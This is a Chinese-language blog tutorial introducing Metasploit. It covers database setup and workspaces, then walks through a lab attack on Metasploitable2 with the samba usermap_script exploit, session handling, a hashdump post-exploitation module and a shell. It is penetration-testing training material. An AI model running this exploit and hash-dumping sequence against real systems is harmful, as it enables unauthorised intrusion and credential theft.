1.metasploit基础介绍

已于 2023-04-13 20:52:48 修改
阅读量96 收藏
点赞数 1
分类专栏: msf 文章标签: postgresql 安全 网络安全 系统安全 web安全
于 2023-03-28 20:43:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76329510/article/details/129824630
版权

Metasploit基础

  • Metasploit框架介绍
  • Metasploit数据库设置
  • Metasploit测试案例
  • Metasploit的升级

Metasploit框架介绍

MSF是用Ruby编写,采用模块化的方法完成渗透测试,易于拓展和代码编写。
目前支持两种界面操作:

  • msfconsole 命令行
  • armitage 图形化界面

Metasploit数据库设置

使用数据库可储存渗透信息,便于大规模操作

  1. 启动postgresql

    systemctl start postgresql

  2. 初始化数据库

    msfdb init
    数据库文件保存在 /usr/share/metasploit-freamwork/config/datebase.yml

  3. 数据库状态

    systemctl status postgresql
    或者打开框架(进入msfconsole)后使用 db_status
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MlbHYjWC-1680007313086)(1.metasploit%E5%9F%BA%E7%A1%80%E4%BB%8B%E7%BB%8D_md_files/2a9880a0-b627-11ec-b129-9d3e3b1d911b.jpeg?v=1&type=image)]

  4. 其他命令

    框架内查看帮助输入:?,可以配合 (管道与过滤命令) | grep xx命令进行精确查找

Metasploit测试案例

对Metasploitable2进行简单的测试

1.工作空间设置

workspace

工作空间帮助查询workspase -h

工作空间查看workspace

星号*所在的位置表示现在所在的空间

工作空间切换 workspace 工作空间名

新建工作空间 workspace -a metasploit2[192.168.108.132]新建多个空间可以在每个空间之间加空格

重命名 workspace -r 老名字 新名字

删除workspace -d 工作空间名 -D是删除所有空间

2.目标导入设置

  • nmap输出扫描结果文件

    namp -sV -P0 目标Ip -oA 文件名

    -sV扫描开启的服务

    -P0不进行主机存活扫描,不进行ping扫描,避免防火墙报警

    -oA输出所有格式的文件 如果位规定位置则在那个目录下执行操作保存在那个目录下

    删除之前输出的所有格式的内容rm xxx.*

  • msfconsole导入结果

3.漏洞利用代码

db_import文件路径/文件名导入文件 不加文件名可以查看可以导入的文件类型

导入文件后,可以用?查看文件的一些信息如 host查看主机或services查看服务

  • search 服务名称

    查询可以利用的漏洞攻击载荷

  • info漏洞利用代码

    info漏洞攻击载荷(它前面的数字也可以) 可以查看该载荷的使用方式和代码等信息

4.漏洞利用流程

  • use 漏洞的路径(前面的数字也可以)如 use multi/samba/usermap_script

  • options查看所要的配置

  • set配置set rhost 192.168.217.11设置ip

  • runexploit运行

  • 后台会话

    置于后台 CTRL+z键 再加y

    查看sessions

5.后渗透测试

进行其他方面的渗透

hashdump use /post/linux/gather/hashdump

设置session set session n数字n与前面的session保持一致 ,run运行

运行后还会将获取的信息保存在相关的文件夹下

loot 查看数据库信息,初次还会将数据库信息保存到本地

进一步信息通过 loot -h查询

退回到原来的模块 sessions -i 进程号

关于进程其他可以通过 sessions -h查询

shell获取靶机shell 可以改变竖屏(竖屏太难受了)

Metasploit升级

apt-get update+apt install metasploit-framework

The_bugs_of_world
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
1.Metasploit介绍与基本命令
weixin_30480651的博客
07-03 436
Metasploit体系框架介绍 Metasploit是目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它彻底改变了我们执行安全测试的方式。 Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。Metasploit适用于所有流行的操作系统,但Kali Linux是最受欢迎的操作系统,第一、它预装了几乎所有实用渗透测试工具...
Metasploit基础
Bu2n的博客
12-08 725
Metasploit介绍模块介绍渗透攻击步骤实战演练主机介绍主机发现端口扫描检测漏洞是否存在漏洞利用后渗透攻击:信息收集必须知道的命令进程迁移系统命令文件系统命令后渗透攻击:权限提升 Metasploit介绍 渗透测试人员神器,骇客hack站的武器,涵盖渗透测试流程所用的模块 (以上都是我编的,如有不对,笑笑就好) 模块介绍 Auxiliary(辅助模块) 该模块不会直接在测试者和目标主机之间建立访问,他们只负责扫描、嗅探、指纹识别等相关功能以辅助渗透测试。 Exploit(漏洞利用模块) 利用系统.
metasploit使用介绍
qq_57223070的博客
10-12 4835
一些个人见解,希望能够对你有所帮助!
metasploit基础命令介绍
课嗨教育的专栏
04-02 242
目录 六个模块: metasploit常用命令 六个模块: 一.渗透攻击模块(exploit):利用发现的安全漏洞或配置弱点对远程目标系统进行攻击的代码(1)主动渗透模块(服务端渗透)(2)被动渗透模块(客户端渗透)二.辅助模块(Aux):实现信息收集及口令猜测、Dos攻击等无法直接取得服务器权限的攻击。三.攻击载荷模块(payload):攻击载荷是在渗透攻击成功后促使目标系统运行的一段植入代码四.空指令模块(Nop):空指令(NOP)是一些对程序运行状态不会造成任何实质影响的空操作或无...
metasploit】1 渗透测试与metasploit基础介绍 [PTES|msf|armitage安装]
kkza的博客
06-12 351
PTES标准渗透测试步骤 前期交互 与客户进行沟通,确定渗透测试的目标与范围 情报收集 收集客户组织的信息,利用包括但不限于社交媒体、Google hacking、端口/服务扫描等技术收集信息 威胁建模 根据收集到的信息,来推断目标系统可能存在的安全漏洞 漏洞分析 综合前面的信息,分析和理解哪些攻击方式是可行的(漏洞验证?) 渗透攻击 实战模拟攻击(漏洞利用?) 后渗透 攻陷目标或者取得权限后,识别关键业务信息 报告阶段 ...
Metasploit工具框架介绍
Dreamsi_zhang的博客
08-09 964
一、Metasploit介绍 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有
Metasploit技术(一)——Metasploit简介与基础
Phantom03167的博客
03-28 9338
Metasploit简介与基础
Metasploit基础与体系框架
永远是少年
06-01 402
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF简介 一、Metasploit是什么 二、Metasploit体系框架
metasploit系列之入门介绍(1)
D1stiny的博客
05-05 261
文章目录一些专业术语MSF基础知识启动设置 Metasploit是一个漏洞框架,它的全称叫The Metasploit Framework,简称MSF。Metasploit作为一款全球最受欢迎的工具,不仅仅因为他的方便性和强大性,更重要的是它的框架,它允许使用者开发自己的漏洞脚本,从而进行测试。 一些专业术语 渗透攻击(exploit) 测试者利用系统,程序或服务的漏洞进行攻击的一个过程。 攻击...
Packtpub.Metasploit.Penetration.Testing.Cookbook.Jun.2012
04-24
Metasploit基础 - **安装与配置**:介绍如何在不同的操作系统上安装和配置Metasploit。 - **基本命令**:列举并解释了常用的Metasploit命令,如`search`、`use`、`set`、`run`等。 - **工作流程**:概述了使用...
Metasploit Framework基础介绍及下载
12-06
### Metasploit Framework 基础介绍及下载 #### Metasploit Framework 概述 Metasploit Framework(MSF)自2003年起以开放源代码的方式发布,是一款功能强大的安全工具,专为渗透测试、shellcode编写与漏洞研究而...
Metasploit渗透测试指南.修订版
09-12
1. **Metasploit基础**:介绍如何安装和配置Metasploit环境,包括基本的命令行操作和工作流程,如加载模块、设置选项和执行攻击。 2. **漏洞利用(Exploits)**:详细解释了exploit的工作原理,以及如何在...
Ubuntu22.04安装Go语言的几种方式
ALONG的博客
07-25 950
Go 推荐使用工作空间(workspace)的概念来组织代码。:Go 语言有许多有用的第三方工具,你可以使用它们来增强开发体验,例如。:安装完成后,你可以通过阅读官方文档、在线教程或书籍来学习 Go 语言。请注意,Go 语言的版本更新频繁,上述命令中使用的版本号(例如。建议访问 Go 官方网站下载最新版本。请检查 Go 官方网站以获取最新版本的下载链接。配置 Go 环境变量。这将把 Go 安装到。来创建一个工作空间。
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 455
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
水域救援设备,保护水域安全_鼎跃安全
最新发布
ShenZhenDingYue的博客
08-06 191
当然,水域安全问题不仅需要水域救援人员和设备的保障,还需要我们每个人进行水域安全知识的学习和培训,严格遵守当地的水域安全管理条例,在进行水域活动时,尽量结伴而行,保持联系。这些水域安全设备能够为我们水域活动提供保障,也可以提供水域救援的效率,降低安全风险,保障生命安全。与此同时,随着水域经济的蓬勃发展,各类水上及水下娱乐活动日益丰富多样,从刺激的冲浪、潜水到悠闲的划船、垂钓,无一不吸引着四面八方的游客纷至沓来,享受水上乐趣。绳子具有浮力,方便在水面使用,用于远距离救援,将绳子抛给落水者。
【系统架构设计师】二十四、安全架构设计理论与实践②
帅次的博客
08-04 778
安全技术体系架构是对组织机构信息技术系统的安全体系结构的整体描述。安全技术体系架构的目标是建立可持续改进的安全技术体系架构的能力。根据网络中风险威胁的存在实体划分出5个层次的实体对象:应用、存储、主机、网络和物理。
Metasploit入门全攻略:从基础到进阶实战
1. Metasploit常用参数介绍介绍Metasploit的核心工具及其常见参数,帮助新用户理解如何正确地使用这个强大的渗透测试框架。 2. PostgreSQL数据库介绍Metasploit背后的数据库技术,可能涉及如何与Metasploit的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值